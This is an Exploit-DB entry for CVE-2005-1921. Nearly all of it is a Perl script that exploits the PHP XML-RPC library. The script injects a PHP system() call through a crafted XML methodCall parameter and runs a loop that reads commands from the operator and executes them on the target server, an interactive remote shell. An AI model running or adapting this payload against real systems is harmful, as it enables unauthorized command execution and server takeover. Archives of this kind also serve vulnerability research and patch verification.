XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)

EDB-ID:

1084

CVE:

2005-1921

EDB Verified:

Author:

Mike Rifone

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2005-07-04

Vulnerable App:

#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

$host = $ARGV[0]; 

if ( !$host ) 
{ 
	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); 
}

while ( $host ) 
{

	print "xmlrpc\@\#";
	
	$exec = <STDIN>;	
	$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
	
	$send = new HTTP::Request POST => $host;
	$send->content($data);
	$gots = $brws->request($send);	
	$show = $gots->content;
	
	if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
	{
	    print $2 . "\n";
	}
	else
	{
		print "$show\n";
	}


}

# milw0rm.com [2005-07-04]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services